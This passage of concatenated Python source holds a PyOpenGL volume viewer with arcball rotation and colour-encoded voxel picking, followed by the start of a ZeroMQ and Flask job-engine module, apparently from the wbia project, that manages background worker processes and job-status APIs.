glEnable(GL_COLOR_MATERIAL) glLightfv(GL_LIGHT0, GL_SPECULAR, (0,0,0)) glutDisplayFunc(self.draw) glutKeyboardFunc(self.keyboard) glutMouseFunc(self.on_click) glutMotionFunc(self.on_drag) glutMouseWheelFunc(self.on_scroll) glutIdleFunc(self.on_idle) glutReshapeFunc(self.on_resize) glutMainLoop() return def on_resize(self, w, h): '''resize the viewing window''' self.win_h = h self.win_w = w glViewport(0,0, w,h) self.arcball.place([self.win_w/2, self.win_h/2], self.win_w/2) def translate(self, x, y): '''translate the viewing box based on mouse location''' self.center_x = self.center_x+((float(x)/self.win_w)-.5)*2 self.center_y = self.center_y-((float(y)/self.win_h)-.5)*2 def shift(self, key): '''translate the viewing box based on keyboard input''' #may want to tune the translation levels better if key == chr(105): self.center_y -=float(self.fov)**2/10000 elif key == chr(106): self.center_x 
+=float(self.fov)**2/10000 elif key == chr(107): self.center_y += float(self.fov)**2/10000 elif key == chr(108): self.center_x -=float(self.fov)**2/10000 def reset_translation(self): '''reset the viewing box to 0 translation''' self.center_x = 0 self.center_y = 0 glutPostRedisplay() def reset_zoom(self): '''reset the zoom level''' self.fov = 60 glutPostRedisplay() def reset(self): self.reset_translation() self.reset_zoom() def on_idle(self): timer = time.time() while(not self.in_q.empty() and time.time()-timer<.1): self.icon_color = (self.icon_color + .01)%1 #resets to black when icon is green since 1.0 and 0.0 %1 are equal temp = self.in_q.get() if temp[0] == "marker": self.pick_location = temp[1:][0] self.pick_location[0] = int(float(self.pick_location[0]*self.columns)/self.max_x) self.pick_location[1] = int(float(self.pick_location[1]*self.rows)/self.max_y) elif temp[0] == "ids": self.num_labels += 1 label_idx = self.num_labels self.label_dict[label_idx] = temp[1:][0][0][0] extr = extractor.Extractor(self.in_q, self.directory, temp[1:][0], self.pick_location, self.max_x, self.max_y, label_idx) self.extractor_dict[temp[1][0][0]] = extr extracting_worker = threading.Thread(target = extr.run, name = "extr") extracting_worker.daemon = True extracting_worker.start() elif temp[0] == "contours": contours = temp[1] color = temp[2] primary_label = temp[3] normals = temp[4] label_idx = temp[5] if self.make_lists: self.make_display_lists(contours, color/255.0, primary_label, normals, label_idx) elif temp[0] == "limits": self.max_x= temp[1] self.max_y = temp[2] self.layers = temp[3] elif temp[0] == "refresh": self.refresh() elif temp[0] == "remove": self.remove_label(temp[1:][0]) self.st = time.time() glutPostRedisplay() #set icon to green if processes are done if time.time()-self.st > 0.25: self.icon_color = np.array((0.0, 1.0, 0.0)) self.make_lists = True glutPostRedisplay() def loading_icon(self): glBegin(GL_QUADS) glVertex3f(-1.0, -1.0, 1.0) glVertex3f(-.95, -1.0, 1.0) glVertex3f(-.95, -.95, 1.0) glVertex3f(-1.0, -.95, 1.0) glEnd() def refresh(self): '''Clears all contours and deletes working extractors''' #first display list is for the box self.num_labels = 0 glDeleteLists(2, self.display_list_idx) self.in_q.queue.clear() self.make_lists = False self.display_list_idx = 2 for key in self.extractor_dict.keys(): self.extractor_dict[key].stop() glutPostRedisplay() def undo(self): label = self.display_list_dict.keys()[0] for display_list in self.display_list_dict[label]: glDeleteLists(display_list, 1) #delete back and front lists glutPostRedisplay() def remove_label(self, ids): '''remove a single contour''' for display_list in self.display_list_dict[ids[0]]: glDeleteLists(display_list, 1) self.extractor_dict[ids[0]].stop() glutPostRedisplay() def create_arcball(self): arcball = arc.Arcball() #locate the arcball center at center of window with radius half the width arcball.place([self.win_w/2, self.win_h/2], self.win_w/2) return arcball def make_display_lists(self, contours, color, label, normals, label_idx): '''Generates display lists to draw both the front and back buffered images''' if self.first: #make the box display_list = glGenLists(1) self.axes() self.make_box_list() self.first = False self.display_lists = glGenLists(2) #first list for front, second for back if label in self.display_list_dict: self.display_list_dict[label] = self.display_list_dict[label] + [self.display_list_idx, self.display_list_idx+1] else: self.display_list_dict[label] = [self.display_list_idx, self.display_list_idx+1] 
self.make_front_list(contours, color, normals) self.make_back_list(contours, label_idx) self.display_list_idx +=2 def make_back_list(self, contours, label_idx): '''Creates a display list to encode color for image. Not seen by user''' glNewList(self.display_list_idx+1, GL_COMPILE) glDisable(GL_LIGHTING) #don't use lighting for color encoding glMatrixMode(GL_MODELVIEW) glPushMatrix() #glTranslatef(-.9, .9, .9) glTranslatef(-.9*self.x2x, .9*self.y2x, .9*self.z2x) glScalef(1.8*self.x2x/self.columns, -1.8*self.y2x/self.rows, -1.8*self.z2x/self.layers) #glScalef(1.8/self.columns, -1.8/self.rows, -1.8/self.layers) #draw the layers glEnableClientState(GL_VERTEX_ARRAY) glEnableClientState(GL_COLOR_ARRAY) for cnt in contours: colors = np.zeros((cnt.shape[0], 4), np.float) colors[:, :3] = cnt colors[:, 0] /= self.columns - 1 colors[:, 1] /= - (self.rows - 1) colors[:, 2] /= - (self.layers - 1) colors[:, 1:3] += 1 colors[:, 3] = label_idx/255.0 glVertexPointer(3, GL_INT, 0, cnt) glColorPointer(4, GL_FLOAT, 0, colors) glDrawArrays(GL_TRIANGLE_STRIP, 0, cnt.shape[0]) glDisableClientState(GL_VERTEX_ARRAY) glDisableClientState(GL_COLOR_ARRAY) glPopMatrix() glEnable(GL_LIGHTING) glEndList() def make_front_list(self, contours, color, normals): '''Creates a display list to draw a box and the data scaled to .9*the size of the window. This list deals with the display seen by the user''' glNewList(self.display_list_idx, GL_COMPILE) glMatrixMode(GL_MODELVIEW) glPushMatrix() glTranslatef(-.9*self.x2x, .9*self.y2x, .9*self.z2x) glScalef(1.8*self.x2x/self.columns, -1.8*self.y2x/self.rows, -1.8*self.z2x/self.layers) #glScalef(1.8/self.columns, -1.8/self.rows, -1.8/self.layers) #draw the layers glMaterialfv(GL_FRONT_AND_BACK, GL_AMBIENT_AND_DIFFUSE, color) glEnableClientState(GL_VERTEX_ARRAY) glEnableClientState(GL_NORMAL_ARRAY) glEnableClientState(GL_COLOR_ARRAY) for cnt, normal in zip(contours, normals): colors = np.zeros_like(normal) colors[...] 
= np.array(color) colors[cnt[:, 0] == self.columns, :] = np.array([1, 0, 0]) colors[cnt[:, 0] == 0, :] = np.array([1, 0, 0]) colors[cnt[:, 1] == self.rows, :] = np.array([0, 1, 0]) colors[cnt[:, 1] == 0, :] = np.array([0, 1, 0]) colors[cnt[:, 2] == self.layers - 1, :] = np.array([0, 1, 1]) colors[cnt[:, 2] == 0, :] = np.array([0, 1, 1]) glVertexPointer(3, GL_INT, 0, cnt) glNormalPointer(GL_FLOAT, 0, normal) glColorPointer(3, GL_FLOAT, 0, colors) glDrawArrays(GL_TRIANGLE_STRIP, 0, cnt.shape[0]) glDisableClientState(GL_VERTEX_ARRAY) glDisableClientState(GL_NORMAL_ARRAY) glDisableClientState(GL_COLOR_ARRAY) glPopMatrix() glEndList() def make_box_list(self): '''makes a display list to draw the box''' x = self.x2x*.9; y = self.y2x*.9; z = self.z2x*.9; glNewList(1, GL_COMPILE) glMatrixMode(GL_MODELVIEW) glPushMatrix() #make a box around the image glBegin(GL_LINES) glColor3f(1.0, 0, 0) #x in red glVertex3f(-x, -y, -z) glVertex3f(x, -y, -z) glVertex3f(-x, y, -z) glVertex3f(x, y, -z) glVertex3f(-x, -y, z) glVertex3f(x, -y, z) glVertex3f(-x, y, z) glVertex3f(x, y, z) ''' glVertex3f(-.9, -.9, -.9) glVertex3f(.9, -.9, -.9) glVertex3f(-.9, .9, -.9) glVertex3f(.9, .9, -.9) glVertex3f(-.9, -.9, .9) glVertex3f(.9, -.9, .9) glVertex3f(-.9, .9, .9) glVertex3f(.9, .9, .9) ''' glColor3f(0,1.0, 0) #y in green glVertex3f(-x, -y, -z) glVertex3f(-x, y, -z) glVertex3f(x, -y, -z) glVertex3f(x, y, -z) glVertex3f(-x, y, z) glVertex3f(-x, -y, z) glVertex3f(x, -y, z) glVertex3f(x, y, z) ''' glVertex3f(-.9, -.9, -.9) glVertex3f(-.9, .9, -.9) glVertex3f(.9, -.9, -.9) glVertex3f(.9, .9, -.9) glVertex3f(-.9, .9, .9) glVertex3f(-.9, -.9, .9) glVertex3f(.9, -.9, .9) glVertex3f(.9, .9, .9) ''' glColor3f(0,0,1.0) #z in blue glVertex3f(-x, -y, -z) glVertex3f(-x, -y, z) glVertex3f(x, -y, -z) glVertex3f(x, -y, z) glVertex3f(-x, y, -z) glVertex3f(-x, y, z) glVertex3f(x, y, -z) glVertex3f(x, y, z) ''' glVertex3f(-.9, -.9, -.9) glVertex3f(-.9, -.9, .9) glVertex3f(.9, -.9, -.9) glVertex3f(.9, -.9, .9) glVertex3f(-.9, .9, -.9) glVertex3f(-.9, .9, .9) glVertex3f(.9, .9, -.9) glVertex3f(.9, .9, .9) ''' glEnd() glDisable(GL_LIGHTING) glColor3f(0.5, 0.5, 0.5) glRasterPos3f(-.9*self.x2x, .9*self.y2x, .9*self.z2x) glutBitmapString(GLUT_BITMAP_TIMES_ROMAN_24, "(0,0,0)") glRasterPos3f(.9*self.x2x, .9*self.y2x, .9*self.z2x) glutBitmapString(GLUT_BITMAP_TIMES_ROMAN_24, "x=" + str(self.columns-1)) glRasterPos3f(-.9*self.x2x, -.9*self.y2x, .9*self.z2x) glutBitmapString(GLUT_BITMAP_TIMES_ROMAN_24, "y= " + str(self.rows-1)) glRasterPos3f(-.9*self.x2x, .9*self.y2x, -.9*self.z2x) glutBitmapString(GLUT_BITMAP_TIMES_ROMAN_24, "z= " + str(self.layers-1)) glEnable(GL_LIGHTING) glPopMatrix() glEndList() def draw(self, pick=False): '''draws an image''' glMatrixMode(GL_PROJECTION) glLoadIdentity() gluPerspective(self.fov, self.aspect, 1, 10) glMatrixMode(GL_MODELVIEW) glDrawBuffer(GL_BACK) glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT) glLoadIdentity() gluLookAt(self.center_x,self.center_y, 3, self.center_x, self.center_y, 2, 0,1,0) #Draw icon after rotating glColor3fv(self.icon_color) self.loading_icon() glColor3f(0.0, 0.0, 0.0) glMultMatrixd(self.arcball.matrix().T) glCallList(1)#draw the box and loading icon if not pick: #even numbers for display for idx in range(2, self.display_list_idx+1, 2): glCallList(idx) self.draw_marker() glutSwapBuffers() else: #odd numbers for picking for idx in range(3, self.display_list_idx+1, 2): glCallList(idx) glFlush() return def draw_marker(self): '''Draws a sphere around the chosen point. 
Color is inverse of chosen pixel''' glMaterialfv(GL_FRONT_AND_BACK, GL_AMBIENT_AND_DIFFUSE, (0.0, 0.0, 0.0)) glMatrixMode(GL_MODELVIEW) glPushMatrix() location = self.pick_location glTranslatef(self.x2x*(1.8*location[0]/self.columns-.9), -self.y2x*(1.8*location[1]/self.rows-.9), -self.z2x*(1.8*location[2]/self.layers-.9)) glColor3fv(self.marker_color) glMaterial glutSolidSphere(.01, 50, 50) glTranslatef(-self.x2x*(1.8*location[0]/self.columns-.9), self.y2x*(1.8*location[1]/self.rows-.9),0) #draw a square parellel to z plane at z level of marker glBegin(GL_LINES) glColor3f(1.0, 1.0, 1.0) glVertex3f(-.9*self.x2x, -.9*self.y2x, 0) glVertex3f(.9*self.x2x, -.9*self.y2x, 0) glVertex3f(-.9*self.x2x, .9*self.y2x, 0) glVertex3f(.9*self.x2x, .9*self.y2x, 0) glVertex3f(-.9*self.x2x, -.9*self.y2x, 0) glVertex3f(-.9*self.x2x, .9*self.y2x, 0) glVertex3f(.9*self.x2x, -.9*self.y2x, 0) glVertex3f(.9*self.x2x, .9*self.y2x, 0) glVertex3f(-.9*self.x2x, .9*self.y2x, 0) glVertex3f(-.9*self.x2x, -.9*self.y2x, 0) glVertex3f(.9*self.x2x, -.9*self.y2x, 0) glVertex3f(.9*self.x2x, .9*self.y2x, 0) glEnd() glColor3f(1.0, 0, 0) glRasterPos(.9*self.x2x, .9*self.y2x, 0) glutBitmapString(GLUT_BITMAP_TIMES_ROMAN_24, "z= " + str(location[2])) glPopMatrix() def keyboard(self, key, x, y): key = key.lower() if key == chr(27): #escape to quit sys.exit() if key == chr(8): #backspace to refresh/clear self.refresh() if key == chr(117): #u to undo self.undo() if key == chr(116): #t to translate to mouse location self.translate(x,y) if key == chr(99): #c to center the box self.reset_translation() if (key == chr(105) or key == chr(106) or key == chr(107) or key == chr(108)): #i, j, k, l to translate by increment self.shift(key) if (key == chr(114)): #r to reset the translation and zoom self.reset() if (key == chr(122)): #z to reset the zoom self.reset_zoom() return def on_scroll(self, wheel, direction, x, y): '''zooms in and out on mouse scroll wheel''' self.fov -= 1 if direction == 1 else -1 glutPostRedisplay() def on_click(self, button, state, x, y): #Left click for arcball rotation if (button == GLUT_LEFT_BUTTON and state == GLUT_DOWN): self.left = True #turn on dragging rotation self.arcball.down((x,y)) #right click to select a pixel location elif (button == GLUT_RIGHT_BUTTON and state == GLUT_DOWN): self.left = False #turn off dragging rotation self.draw(pick=True) self.pick_location, self.marker_color, self.label = self.pick(x,y) print "location", self.pick_location[0], self.pick_location[1], self.pick_location[2], self.label #send the label location to mojo sys.stdout.flush() self.has_marker = True def pick(self, x,y): '''gets the (x,y,z) location in the full volume of a chosen pixel''' click_color = None glReadBuffer(GL_BACK) temp = glReadPixels(x,self.win_h-y, 1,1, GL_RGBA, GL_FLOAT)[0][0] click_color = temp[:3] label_idx = int(temp[3]*255.0 + .5) label = self.label_dict[label_idx] if not np.all(click_color==0): location = [int(click_color[0]*(self.columns-1)), int(-(click_color[1]-1)*(self.rows-1)), int(-(click_color[2]-1)*((self.layers-1)))] glReadBuffer(GL_FRONT) marker_color_neg = glReadPixels(x,self.win_h-y, 1,1, GL_RGB, GL_FLOAT)[0][0] marker_color = 1-marker_color_neg return location, marker_color, label return self.pick_location, self.marker_color, self.label def on_drag(self, x, y): '''rotates image on dragging with left mouse down''' if self.left: self.arcball.drag((x,y)) glutPostRedisplay() def axes(self): '''generates vertices for a box''' self.x_axis = [[[0,0,0], [self.columns, 0,0]], [[0,self.rows,0], 
[self.columns, self.rows, 0]], [[0,0,self.layers], [self.columns,0,self.layers]], [[0, self.rows, self.layers], [self.columns, self.rows, self.layers]]] self.y_axis = [[[0,0,0], [0, self.rows,0]], [[self.columns,0,0],[self.columns, self.rows, 0]], [[0,0,self.layers], [0,self.rows, self.layers]], [[self.columns, 0, self.layers],[self.columns, self.rows, self.layers]]] self.z_axis = [[[0,0,0], [0,0,self.layers]], [[self.columns,0,0],[self.columns, 0, self.layers]], [[0, self.rows,0], [0, self.rows, self.layers]],[[self.columns, self.rows, 0],[self.columns, self.rows, self.layers]]] if __name__ == '__main__': print OpenGL.GL.__file__, OpenGL.GLU.__file__, OpenGL.GLUT.__file__ display_queue = Queue() sys.argv.pop(0) #extract command line arguments directory = sys.argv[0] location = (int(sys.argv[1]), int(sys.argv[2]), int(sys.argv[3])) #x,y,z max_x =int(sys.argv[4]) max_y = int(sys.argv[5]) ids = [] for label_set in (sys.argv[6:len(sys.argv)]): primary_id = [] secondary_ids = [] split_str = re.split(":", label_set) primary_id = [int(split_str[0])] if split_str[1] != "": secondary_ids = [int(label) for label in re.split(',', split_str[1])] ids += [primary_id + secondary_ids] extr = extractor.Extractor(display_queue, directory, ids, location, max_x, max_y, 0) viewer = Viewer(location, display_queue, directory, max_x, max_y) viewer.extractor_dict[ids[0][0]] = extr handler = handler.Input_Handler(display_queue) viewer.set_dimensions(extr.rows, extr.columns, extr.layers, extr.w) viewer.label_dict[0] = ids[0][0] extracting_worker = threading.Thread(target = extr.run, name = "extr") input_worker = threading.Thread(target = handler.run, name = "input_worker") input_worker.daemon =True extracting_worker.daemon = True extracting_worker.start() input_worker.start() viewer.main()
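# Illustrative snippet (not part of the viewer above): a standalone sketch of the
# colour-encoded picking used by make_back_list() and pick(). Each vertex is drawn into the
# back buffer with its (x, y, z) voxel coordinate packed into the RGB channels (and the label
# index into alpha), so a single glReadPixels on a click recovers the 3-D location. The
# dimensions below are arbitrary example values; decode_location() rounds explicitly here,
# whereas the viewer truncates the quantised colour it reads back from the frame buffer.
def encode_location(x, y, z, columns, rows, layers):
    r = float(x) / (columns - 1)
    g = 1.0 - float(y) / (rows - 1)
    b = 1.0 - float(z) / (layers - 1)
    return (r, g, b)


def decode_location(color, columns, rows, layers):
    r, g, b = color
    x = int(round(r * (columns - 1)))
    y = int(round((1.0 - g) * (rows - 1)))
    z = int(round((1.0 - b) * (layers - 1)))
    return (x, y, z)


# quick round-trip check with example dimensions
columns, rows, layers = 1024, 768, 100
point = (500, 300, 42)
packed = encode_location(point[0], point[1], point[2], columns, rows, layers)
assert decode_location(packed, columns, rows, layers) == point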
job_engine.py
# -*- coding: utf-8 -*- """ Accepts and handles requests for tasks. Each of the following runs in its own Thread/Process. BASICALLY DO A CLIENT/SERVER TO SPAWN PROCESSES AND THEN A PUBLISH SUBSCRIBE TO RETURN DATA Accepter: Receives tasks and requests Delegates tasks and responds to requests Tasks are delgated to an engine Engine: the engine accepts requests. the engine immediately responds WHERE it will be ready. the engine sends a message to the collector saying that something will be ready. the engine then executes a task. The engine is given direct access to the data. Collector: The collector accepts requests The collector can respond: * <ResultContent> * Results are ready. * Results are not ready. * Unknown jobid. * Error computing results. * Progress percent. References: Simple task farm, with routed replies in pyzmq http://stackoverflow.com/questions/7809200/implementing-task-farm-messaging-pattern-with-zeromq https://gist.github.com/minrk/1358832 Notes: We are essentially goint to be spawning two processes. We can test these simultaniously using python -m wbia.web.job_engine job_engine_tester We can test these separately by first starting the background server python -m wbia.web.job_engine job_engine_tester --bg Alternative: python -m wbia.web.job_engine job_engine_tester --bg --no-engine python -m wbia.web.job_engine job_engine_tester --bg --only-engine --fg-engine And then running the forground process python -m wbia.web.job_engine job_engine_tester --fg """ # if False: # import os # os.environ['UTOOL_NOCNN'] = 'True' # import logging import utool as ut import time import zmq import uuid # NOQA import numpy as np import shelve import random from datetime import datetime, timedelta import pytz import flask from os.path import join, exists, abspath, splitext, basename from functools import partial from wbia.control import controller_inject import multiprocessing print, rrr, profile = ut.inject2(__name__) # NOQA # logger = logging.getLogger('wbia') CLASS_INJECT_KEY, register_ibs_method = controller_inject.make_ibs_register_decorator( __name__ ) register_api = controller_inject.get_wbia_flask_api(__name__) ctx = zmq.Context.instance() # FIXME: needs to use correct number of ports URL = 'tcp://127.0.0.1' NUM_DEFAULT_ENGINES = ut.get_argval('--engine-lane-workers', int, 2) NUM_SLOW_ENGINES = ut.get_argval('--engine-slow-lane-workers', int, NUM_DEFAULT_ENGINES) NUM_FAST_ENGINES = ut.get_argval('--engine-fast-lane-workers', int, NUM_DEFAULT_ENGINES) NUM_ENGINES = { 'slow': NUM_SLOW_ENGINES, 'fast': NUM_FAST_ENGINES, } # VERBOSE_JOBS = ( # ut.get_argflag('--bg') or ut.get_argflag('--fg') or ut.get_argflag('--verbose-jobs') # ) VERBOSE_JOBS = False GLOBAL_SHELVE_LOCK = multiprocessing.Lock() TIMESTAMP_FMTSTR = '%Y-%m-%d %H:%M:%S %Z' TIMESTAMP_TIMEZONE = 'US/Pacific' JOB_STATUS_CACHE = {} def update_proctitle(procname, dbname=None): try: import setproctitle print('CHANGING PROCESS TITLE') old_title = setproctitle.getproctitle() print('old_title = %r' % (old_title,)) hostname = ut.get_computer_name() new_title = 'WBIA_%s_%s_%s' % (dbname, hostname, procname) print('new_title = %r' % (new_title,)) setproctitle.setproctitle(new_title) except ImportError: print('pip install setproctitle') def _get_engine_job_paths(ibs): shelve_path = ibs.get_shelves_path() ut.ensuredir(shelve_path) record_filepath_list = list(ut.iglob(join(shelve_path, '*.pkl'))) return record_filepath_list def _get_engine_lock_paths(ibs): shelve_path = ibs.get_shelves_path() ut.ensuredir(shelve_path) lock_filepath_list = 
list(ut.iglob(join(shelve_path, '*.lock'))) return lock_filepath_list @register_ibs_method def retry_job(ibs, jobid): shelve_path = ibs.get_shelves_path() job_record_filename = '%s.pkl' % (jobid,) job_record_filepath = join(shelve_path, job_record_filename) assert exists(job_record_filepath) job_record = ut.load_cPkl(job_record_filepath) job_action = job_record['request']['action'] job_args = job_record['request']['args'] job_kwargs = job_record['request']['kwargs'] job_func = getattr(ibs, job_action, None) if job_func is not None: job_result = job_func(*job_args, **job_kwargs) return job_action, job_func, job_args, job_kwargs, job_result @register_ibs_method def initialize_job_manager(ibs): """ Starts a background zmq job engine. Initializes a zmq object in this thread that can talk to the background processes. Run from the webserver CommandLine: python -m wbia.web.job_engine --exec-initialize_job_manager:0 Example: >>> # DISABLE_DOCTEST >>> # xdoctest: +REQUIRES(--job-engine-tests) >>> from wbia.web.job_engine import * # NOQA >>> import wbia >>> ibs = wbia.opendb(defaultdb='testdb1') >>> from wbia.web import apis_engine >>> from wbia.web import job_engine >>> ibs.load_plugin_module(job_engine) >>> ibs.load_plugin_module(apis_engine) >>> ibs.initialize_job_manager() >>> print('Initializqation success. Now closing') >>> ibs.close_job_manager() >>> print('Closing success.') """ ibs.job_manager = ut.DynStruct() use_static_ports = False if ut.get_argflag('--web-deterministic-ports'): use_static_ports = True if ut.get_argflag('--fg'): ibs.job_manager.reciever = JobBackend(use_static_ports=True) else: ibs.job_manager.reciever = JobBackend(use_static_ports=use_static_ports) ibs.job_manager.reciever.initialize_background_processes( dbdir=ibs.get_dbdir(), containerized=ibs.containerized ) # Delete any leftover locks from before lock_filepath_list = _get_engine_lock_paths(ibs) print('Deleting %d leftover engine locks' % (len(lock_filepath_list),)) for lock_filepath in lock_filepath_list: ut.delete(lock_filepath) ibs.job_manager.jobiface = JobInterface( 0, ibs.job_manager.reciever.port_dict, ibs=ibs ) ibs.job_manager.jobiface.initialize_client_thread() # Wait until the collector becomes live while 0 and True: result = ibs.get_job_status(-1) print('result = %r' % (result,)) if result['status'] == 'ok': break ibs.job_manager.jobiface.queue_interrupted_jobs() # import wbia # #dbdir = '/media/raid/work/testdb1' # from wbia.web import app # web_port = ibs.get_web_port_via_scan() # if web_port is None: # raise ValueError('IA web server is not running on any expected port') # proc = ut.spawn_background_process(app.start_from_wbia, ibs, port=web_port) @register_ibs_method def close_job_manager(ibs): # if hasattr(ibs, 'job_manager') and ibs.job_manager is not None: # pass del ibs.job_manager.reciever del ibs.job_manager.jobiface ibs.job_manager = None @register_ibs_method @register_api('/api/engine/job/', methods=['GET', 'POST'], __api_plural_check__=False) def get_job_id_list(ibs): """ Web call that returns the list of job ids CommandLine: # Run Everything together python -m wbia.web.job_engine --exec-get_job_status # Start job queue in its own process python -m wbia.web.job_engine job_engine_tester --bg # Start web server in its own process ./main.py --web --fg pass # Run foreground process python -m wbia.web.job_engine --exec-get_job_status:0 --fg Example: >>> # xdoctest: +REQUIRES(--web-tests) >>> # xdoctest: +REQUIRES(--job-engine-tests) >>> from wbia.web.job_engine import * # NOQA >>> import wbia >>> 
with wbia.opendb_bg_web('testdb1', managed=True) as web_ibs: # , domain='http://52.33.105.88') ... # Test get status of a job id that does not exist ... response = web_ibs.send_wbia_request('/api/engine/job/', jobid='badjob') """ status = ibs.job_manager.jobiface.get_job_id_list() jobid_list = status['jobid_list'] return jobid_list @register_ibs_method @register_api( '/api/engine/process/status/', methods=['GET', 'POST'], __api_plural_check__=False ) def get_process_alive_status(ibs): status_dict = ibs.job_manager.reciever.get_process_alive_status() print('status_dict = %r' % (status_dict,)) return status_dict @register_ibs_method @register_api( '/api/engine/job/status/', methods=['GET', 'POST'], __api_plural_check__=False ) def get_job_status(ibs, jobid=None): """ Web call that returns the status of a job Returns one of: received - job has been received, but not ingested yet accepted - job has been accepted (validated) queued - job has been transferred to the engine queue working - job is being worked on by the engine publishing - job is done on the engine, pushing results to collector completed | exception - job is complete or has an error CommandLine: # Run Everything together python -m wbia.web.job_engine --exec-get_job_status # Start job queue in its own process python -m wbia.web.job_engine job_engine_tester --bg # Start web server in its own process ./main.py --web --fg pass # Run foreground process python -m wbia.web.job_engine --exec-get_job_status:0 --fg Example: >>> # xdoctest: +REQUIRES(--web-tests) >>> # xdoctest: +REQUIRES(--job-engine-tests) >>> from wbia.web.job_engine import * # NOQA >>> import wbia >>> with wbia.opendb_bg_web('testdb1', managed=True) as web_ibs: # , domain='http://52.33.105.88') ... # Test get status of a job id that does not exist ... response = web_ibs.send_wbia_request('/api/engine/job/status/', jobid='badjob') """ if jobid is None: status = ibs.job_manager.jobiface.get_job_status_dict() else: status = ibs.job_manager.jobiface.get_job_status(jobid) return status # @register_ibs_method # @register_api('/api/engine/job/terminate/', methods=['GET', 'POST']) # def send_job_terminate(ibs, jobid): # """ # Web call that terminates a job # """ # success = ibs.job_manager.jobiface.terminate_job(jobid) # return success @register_ibs_method @register_api( '/api/engine/job/metadata/', methods=['GET', 'POST'], __api_plural_check__=False ) def get_job_metadata(ibs, jobid): """ Web call that returns the metadata of a job CommandLine: # Run Everything together python -m wbia.web.job_engine --exec-get_job_metadata # Start job queue in its own process python -m wbia.web.job_engine job_engine_tester --bg # Start web server in its own process ./main.py --web --fg pass # Run foreground process python -m wbia.web.job_engine --exec-get_job_metadata:0 --fg Example: >>> # xdoctest: +REQUIRES(--web-tests) >>> # xdoctest: +REQUIRES(--slow) >>> # xdoctest: +REQUIRES(--job-engine-tests) >>> # xdoctest: +REQUIRES(--web-tests) >>> from wbia.web.job_engine import * # NOQA >>> import wbia >>> with wbia.opendb_bg_web('testdb1', managed=True) as web_ibs: # , domain='http://52.33.105.88') ... # Test get metadata of a job id that does not exist ... 
response = web_ibs.send_wbia_request('/api/engine/job/metadata/', jobid='badjob') """ status = ibs.job_manager.jobiface.get_job_metadata(jobid) return status @register_ibs_method @register_api('/api/engine/job/result/', methods=['GET', 'POST']) def get_job_result(ibs, jobid): """ Web call that returns the result of a job """ result = ibs.job_manager.jobiface.get_job_result(jobid) return result @register_ibs_method @register_api('/api/engine/job/result/wait/', methods=['GET', 'POST']) def wait_for_job_result(ibs, jobid, timeout=10, freq=0.1): ibs.job_manager.jobiface.wait_for_job_result(jobid, timeout=timeout, freq=freq) result = ibs.job_manager.jobiface.get_unpacked_result(jobid) return result def _get_random_open_port(): port = random.randint(1024, 49151) while not ut.is_local_port_open(port): port = random.randint(1024, 49151) assert ut.is_local_port_open(port) return port def job_engine_tester(): """ CommandLine: python -m wbia.web.job_engine --exec-job_engine_tester python -b -m wbia.web.job_engine --exec-job_engine_tester python -m wbia.web.job_engine job_engine_tester python -m wbia.web.job_engine job_engine_tester --bg python -m wbia.web.job_engine job_engine_tester --fg Example: >>> # SCRIPT >>> from wbia.web.job_engine import * # NOQA >>> job_engine_tester() """ _init_signals() # now start a few clients, and fire off some requests client_id = np.random.randint(1000) reciever = JobBackend(use_static_ports=True) jobiface = JobInterface(client_id, reciever.port_dict) from wbia.init import sysres if ut.get_argflag('--bg'): dbdir = sysres.get_args_dbdir( defaultdb='cache', allow_newdir=False, db=None, dbdir=None ) reciever.initialize_background_processes(dbdir) print('[testzmq] parent process is looping forever') while True: time.sleep(1) elif ut.get_argflag('--fg'): jobiface.initialize_client_thread() else: dbdir = sysres.get_args_dbdir( defaultdb='cache', allow_newdir=False, db=None, dbdir=None ) reciever.initialize_background_processes(dbdir) jobiface.initialize_client_thread() # Foreground test script print('... waiting for jobs') if ut.get_argflag('--cmd'): ut.embed() # jobiface.queue_job() else: print('[test] ... 
emit test1') callback_url = None callback_method = None args = (1,) jobid1 = jobiface.queue_job('helloworld', callback_url, callback_method, *args) jobiface.wait_for_job_result(jobid1) jobid_list = [] args = ([1], [3, 4, 5]) kwargs = dict(cfgdict={'K': 1}) identify_jobid = jobiface.queue_job( 'query_chips_simple_dict', callback_url, callback_method, *args, **kwargs ) for jobid in jobid_list: jobiface.wait_for_job_result(jobid) jobiface.wait_for_job_result(identify_jobid) print('FINISHED TEST SCRIPT') def spawn_background_process(func, *args, **kwargs): import utool as ut func_name = ut.get_funcname(func) name = 'job-engine.Progress-' + func_name proc_obj = multiprocessing.Process(target=func, name=name, args=args, kwargs=kwargs) proc_obj.daemon = True proc_obj.start() return proc_obj class JobBackend(object): def __init__(self, **kwargs): # self.num_engines = 3 self.engine_queue_proc = None self.engine_lanes = ['fast', 'slow'] self.engine_lanes = [lane.lower() for lane in self.engine_lanes] assert 'slow' in self.engine_lanes self.num_engines = {lane: NUM_ENGINES[lane] for lane in self.engine_lanes} self.engine_procs = None self.collect_queue_proc = None self.collect_proc = None # -- only_engine = ut.get_argflag('--only-engine') self.spawn_collector = not only_engine self.spawn_engine = not ut.get_argflag('--no-engine') self.fg_engine = ut.get_argflag('--fg-engine') self.spawn_queue = not only_engine # Find ports self.port_dict = None self._initialize_job_ports(**kwargs) print('JobBackend ports:') ut.print_dict(self.port_dict) def __del__(self): if VERBOSE_JOBS: print('Cleaning up job backend') if self.engine_procs is not None: for lane in self.engine_procs: for engine in self.engine_procs[lane]: try: engine.terminate() except Exception: pass if self.engine_queue_proc is not None: try: self.engine_queue_proc.terminate() except Exception: pass if self.collect_proc is not None: try: self.collect_proc.terminate() except Exception: pass if self.collect_queue_proc is not None: try: self.collect_queue_proc.terminate() except Exception: pass if VERBOSE_JOBS: print('Killed external procs') def _initialize_job_ports(self, use_static_ports=False, static_root=51381): # _portgen = functools.partial(next, itertools.count(51381)) key_list = [ 'collect_pull_url', 'collect_push_url', 'engine_pull_url', # 'engine_push_url', # 'collect_pushpull_url', ] for lane in self.engine_lanes: key_list.append('engine_%s_push_url' % (lane,)) # Get ports if use_static_ports: port_list = range(static_root, static_root + len(key_list)) else: port_list = [] while len(port_list) < len(key_list): port = _get_random_open_port() if port not in port_list: port_list.append(port) port_list = sorted(port_list) # Assign ports assert len(key_list) == len(port_list) self.port_dict = { key: '%s:%d' % (URL, port) for key, port in list(zip(key_list, port_list)) } def initialize_background_processes( self, dbdir=None, containerized=False, thread=False ): # if VERBOSE_JOBS: print('Initialize Background Processes') def _spawner(func, *args, **kwargs): # if thread: # _spawner_func_ = ut.spawn_background_daemon_thread # else: # _spawner_func_ = ut.spawn_background_process 